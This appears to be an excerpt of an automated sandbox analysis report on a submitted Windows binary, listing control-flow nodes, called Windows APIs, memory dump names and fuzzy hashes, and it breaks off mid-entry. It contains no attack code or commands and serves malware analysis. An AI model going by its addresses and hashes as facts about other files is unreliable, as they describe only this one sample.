                                                                                                          control_flow_graph 282 6d6e02-6d6e07 283 6d6e09-6d6e21 282->283 284 6d6e2f-6d6e38 283->284 285 6d6e23-6d6e27 283->285 287 6d6e4a 284->287 288 6d6e3a-6d6e3d 284->288 285->284 286 6d6e29-6d6e2d 285->286 290 6d6ea4-6d6ea8 286->290 289 6d6e4c-6d6e59 GetStdHandle 287->289 291 6d6e3f-6d6e44 288->291 292 6d6e46-6d6e48 288->292 293 6d6e5b-6d6e5d 289->293 294 6d6e86-6d6e98 289->294 290->283 295 6d6eae-6d6eb1 290->295 291->289 292->289 293->294 296 6d6e5f-6d6e68 GetFileType 293->296 294->290 297 6d6e9a-6d6e9d 294->297 296->294 298 6d6e6a-6d6e73 296->298 297->290 299 6d6e7b-6d6e7e 298->299 300 6d6e75-6d6e79 298->300 299->290 301 6d6e80-6d6e84 299->301 300->290 301->290
                                                                                                          APIs
                                                                                                          • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,006D6CF1,006EFD38,0000000C), ref: 006D6E4E
                                                                                                          • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,006D6CF1,006EFD38,0000000C), ref: 006D6E60
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileHandleType
                                                                                                          • String ID:
                                                                                                          • API String ID: 3000768030-0
                                                                                                          • Opcode ID: 802f6acf3136f9f82a9f08aecc203b01f8c2a21eb9f402aa91ddb37c767b6197
                                                                                                          • Instruction ID: 97bb598c3e8df3a97bbd441825d93122fb9b657f5116d7c65079210807c3c6c5
                                                                                                          • Opcode Fuzzy Hash: 802f6acf3136f9f82a9f08aecc203b01f8c2a21eb9f402aa91ddb37c767b6197
                                                                                                          • Instruction Fuzzy Hash: 821184799087518ACB304E3ECC88662BB97AB96370B38071BF0B6867F1C774D886D241

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 302 6d6163-6d6172 call 6d64d2 305 6d619b-6d61b5 call 6d61ff LCMapStringW 302->305 306 6d6174-6d6199 LCMapStringEx 302->306 310 6d61bb-6d61bd 305->310 306->310
                                                                                                          APIs
                                                                                                          • LCMapStringEx.KERNELBASE(?,006D6B8A,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 006D6197
                                                                                                          • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,-00000008,-00000008,?,006D6B8A,?,?,-00000008,?,00000000), ref: 006D61B5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: String
                                                                                                          • String ID:
                                                                                                          • API String ID: 2568140703-0
                                                                                                          • Opcode ID: 8c7f16b927388f60ef92bdd4fb6308ba1fb90ba6a3ca87bdd4d4a02820fb8c1e
                                                                                                          • Instruction ID: e20b4c5c1a40951afc27804d3e7aff4debabbe29aae058c0a4795b041cce1c56
                                                                                                          • Opcode Fuzzy Hash: 8c7f16b927388f60ef92bdd4fb6308ba1fb90ba6a3ca87bdd4d4a02820fb8c1e
                                                                                                          • Instruction Fuzzy Hash: 57F07A3280025ABBCF126F94DC05DDE3F67FF48360F058415FA1825221CB32C831AB90

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetModuleHandleA.KERNEL32 ref: 006C2038
                                                                                                          • GetModuleFileNameA.KERNEL32 ref: 006C2058
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Module$FileHandleName
                                                                                                          • String ID:
                                                                                                          • API String ID: 4146042529-0
                                                                                                          • Opcode ID: 51daf804a48afb3dd16050545bb544fd8a47a878efc0a2fb46fe87d4b8558c21
                                                                                                          • Instruction ID: 8c6036eae1b48a1fbf3a0bfa08b82b1de12361b18b8d2e8e0f881431d703cc6d
                                                                                                          • Opcode Fuzzy Hash: 51daf804a48afb3dd16050545bb544fd8a47a878efc0a2fb46fe87d4b8558c21
                                                                                                          • Instruction Fuzzy Hash: 3401FFB09082088FC744EF74D9856EDBBF5EB15300F4084ADE4C9D7241EB749688CF86

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 318 6d5327-6d5330 319 6d535f-6d5360 318->319 320 6d5332-6d5345 RtlFreeHeap 318->320 320->319 321 6d5347-6d535e GetLastError call 6d13bd call 6d1374 320->321 321->319
                                                                                                          APIs
                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000000,?,006D96D4,?,00000000,?,?,006D9374,?,00000007,?,?,006D9CBA,?,?), ref: 006D533D
                                                                                                          • GetLastError.KERNEL32(?,?,006D96D4,?,00000000,?,?,006D9374,?,00000007,?,?,006D9CBA,?,?), ref: 006D5348
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorFreeHeapLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 485612231-0
                                                                                                          • Opcode ID: ee42e230e1fe6a9a66a3bd81aca4a39392bf451b2eaef83aab4fd4c243b044fa
                                                                                                          • Instruction ID: ffdbc2f607609bafd215d4325145d79d22a6a64895ee56b4ddb6c25f1c0835ae
                                                                                                          • Opcode Fuzzy Hash: ee42e230e1fe6a9a66a3bd81aca4a39392bf451b2eaef83aab4fd4c243b044fa
                                                                                                          • Instruction Fuzzy Hash: FFE0CD32900744F7CB112FA0ED0DBE93B9B9B423D1F051116F6098EB71E7B19850C785
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _strlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 4218353326-0
                                                                                                          • Opcode ID: bd6cb2db3d1151ea03739bb6a0cb07a048d1bde5d5b4e40a22bbbc2760c83fe3
                                                                                                          • Instruction ID: a79cf050e4b61914794fb4860d93f9e88eca42df25043f76e686dec5b7996b7a
                                                                                                          • Opcode Fuzzy Hash: bd6cb2db3d1151ea03739bb6a0cb07a048d1bde5d5b4e40a22bbbc2760c83fe3
                                                                                                          • Instruction Fuzzy Hash: 87D12274604B408FC764DF29C594BB6BBE2FF4A318B008A1DE8878BB92D734E905CB55
                                                                                                          APIs
                                                                                                          • GetCPInfo.KERNEL32(00000083,?,00000005,006D7328,?), ref: 006D74D9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Info
                                                                                                          • String ID:
                                                                                                          • API String ID: 1807457897-0
                                                                                                          • Opcode ID: fa3b2d9600a3c9edaeca9101c4366fb2073093ab4beb699698a431aa0669c945
                                                                                                          • Instruction ID: 52838fe74dd48ee929227bcee4e248aa2b00376eccd05449eb22de03a33de7cb
                                                                                                          • Opcode Fuzzy Hash: fa3b2d9600a3c9edaeca9101c4366fb2073093ab4beb699698a431aa0669c945
                                                                                                          • Instruction Fuzzy Hash: 90514BB1D0C1589ADB118E28DC84BF9BBAEEF15304F1401EAE589C7342E735AD45CFA2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4d43de84bc187dc49f72d02983a94e267a3cba507618ca99b47b12660cbf3b25
                                                                                                          • Instruction ID: 0053190aa128cc0d45669b81f6ba4f659d10be52dbd18972876ad25c54040401
                                                                                                          • Opcode Fuzzy Hash: 4d43de84bc187dc49f72d02983a94e267a3cba507618ca99b47b12660cbf3b25
                                                                                                          • Instruction Fuzzy Hash: 9A415C32A0011AAFCB24DF69C890EFDB7BAFF19314B54406AE541E7740EB31E945DBA4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b9b1b415963628f570de6a422f1b1eb8eef0b0df8d39529d3cae044db549de70
                                                                                                          • Instruction ID: 3aaf475109bbeb6113441f32a43c80a51c4e78342b7c1cffece59837758cd8f5
                                                                                                          • Opcode Fuzzy Hash: b9b1b415963628f570de6a422f1b1eb8eef0b0df8d39529d3cae044db549de70
                                                                                                          • Instruction Fuzzy Hash: B001B533A00215AF9B129F6CEC8096A33A7FBC5720B26A126F914CB355DB31EC11DBD0
                                                                                                          APIs
                                                                                                          • RtlAllocateHeap.NTDLL(00000000,006D72E5,?,?,006D72E5,00000220,?,?,?), ref: 006D5393
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocateHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 1279760036-0
                                                                                                          • Opcode ID: 5c32c3ef96cf9e7baf57665d9b0fe30b0744988201f6a5e9cf2eec05f027f964
                                                                                                          • Instruction ID: b86f7982187197bd3e9be543e5635a39695a7a6165fdb65477e1608a157c3636
                                                                                                          • Opcode Fuzzy Hash: 5c32c3ef96cf9e7baf57665d9b0fe30b0744988201f6a5e9cf2eec05f027f964
                                                                                                          • Instruction Fuzzy Hash: 2DE0E531E01A54E6DB222B658C00BEA3A8B9B427F0F130123FC17DAB91FFD0DC0089A5
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __floor_pentium4
                                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                          • API String ID: 4168288129-2761157908
                                                                                                          • Opcode ID: f36f48fdc364cad7e74ad0eb14bde1b00e7ffc58b4d5c63806ed1470790eb811
                                                                                                          • Instruction ID: 5664b744faba90d51d10e2286bede527fbdbfea1b07b088b39b06e1aa12d8165
                                                                                                          • Opcode Fuzzy Hash: f36f48fdc364cad7e74ad0eb14bde1b00e7ffc58b4d5c63806ed1470790eb811
                                                                                                          • Instruction Fuzzy Hash: F4D23871E092688FDB65CE29CD407EAB7B6FB45304F1441EAD80DE7240EB78AE859F41
                                                                                                          APIs
                                                                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,006DA7DD,00000002,00000000,?,?,?,006DA7DD,?,00000000), ref: 006DAEC0
                                                                                                          • GetLocaleInfoW.KERNEL32(?,20001004,006DA7DD,00000002,00000000,?,?,?,006DA7DD,?,00000000), ref: 006DAEE9
                                                                                                          • GetACP.KERNEL32(?,?,006DA7DD,?,00000000), ref: 006DAEFE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoLocale
                                                                                                          • String ID: ACP$OCP
                                                                                                          • API String ID: 2299586839-711371036
                                                                                                          • Opcode ID: 4935260367bbb3398feae65f36ee465ced9ca90d89c3e04461ef8a8e0cc46e7e
                                                                                                          • Instruction ID: a3fb779c51ef0d171e42a1d4165cc5294c3da53a0f1cafccb4eacd03a24c85dc
                                                                                                          • Opcode Fuzzy Hash: 4935260367bbb3398feae65f36ee465ced9ca90d89c3e04461ef8a8e0cc46e7e
                                                                                                          • Instruction Fuzzy Hash: EA21C572E08200A6DB348F95C900BD777A7EB94B60B5A8466E90ADB300E732DD41E352
                                                                                                          APIs
                                                                                                            • Part of subcall function 006D55BA: GetLastError.KERNEL32(00000000,?,006D793D), ref: 006D55BE
                                                                                                            • Part of subcall function 006D55BA: SetLastError.KERNEL32(00000000,?,?,00000028,006D1FF3), ref: 006D5660
                                                                                                          • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 006DA7AF
                                                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 006DA7ED
                                                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 006DA800
                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 006DA848
                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 006DA863
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                          • String ID:
                                                                                                          • API String ID: 415426439-0
                                                                                                          • Opcode ID: 3dbf42e3ec82ce1d086854f83580fb1b0725684768554a88691b25454a2ff00a
                                                                                                          • Instruction ID: 0264bcbfcfb28a30645a1f85456cb465a9d9a15d70cd275fa20013d583c040bc
                                                                                                          • Opcode Fuzzy Hash: 3dbf42e3ec82ce1d086854f83580fb1b0725684768554a88691b25454a2ff00a
                                                                                                          • Instruction Fuzzy Hash: 85516E75E04206AFDB50DFE4DC81AFA77BAFF08700F14456AE901EB390EB7199419B62
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a2e3378d954b4332bba990f659ed7c26a809c6bf1397c72b1adf76834141ef38
                                                                                                          • Instruction ID: c834cc8b419b4dd9201e287e4d8b2cfb8532693f29fa2e003de44d2b7d5f3269
                                                                                                          • Opcode Fuzzy Hash: a2e3378d954b4332bba990f659ed7c26a809c6bf1397c72b1adf76834141ef38
                                                                                                          • Instruction Fuzzy Hash: 60021D71E012299BDF14CFA9D8906EDFBF2FF48314F14826AE515E7340D731AA418B95
                                                                                                          APIs
                                                                                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006DB4F9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFindFirst
                                                                                                          • String ID:
                                                                                                          • API String ID: 1974802433-0
                                                                                                          • Opcode ID: 8f07adebd991efd1506afd4e7f92533d25c67b8584689649cadca2aa81327da1
                                                                                                          • Instruction ID: f0f39c5bf0c75166bcf40b63e9f7d0547b368991347a1756891ea693d85e7482
                                                                                                          • Opcode Fuzzy Hash: 8f07adebd991efd1506afd4e7f92533d25c67b8584689649cadca2aa81327da1
                                                                                                          • Instruction Fuzzy Hash: 3A71C071D051989FDF20EF249C89AFAB7BAEB05300F5551DEE009A7359EB318E848F58
                                                                                                          APIs
                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 006C9ADF
                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 006C9BAB
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006C9BC4
                                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 006C9BCE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                          • String ID:
                                                                                                          • API String ID: 254469556-0
                                                                                                          • Opcode ID: 017f841f48c7800d22bc98802992ef81c7bcbdc1f0ce9c741b6e0017db4c07e9
                                                                                                          • Instruction ID: fe4f97ceb07a14972a51b8cf8d0f34adb6f609e96800abb75085056ff40ba68f
                                                                                                          • Opcode Fuzzy Hash: 017f841f48c7800d22bc98802992ef81c7bcbdc1f0ce9c741b6e0017db4c07e9
                                                                                                          • Instruction Fuzzy Hash: D53116B5D052189BDF60DFA4D989BDDBBB8EF08300F1041EAE40CAB250EB719A858F55
                                                                                                          APIs
                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 006CA3A7
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006CA3B6
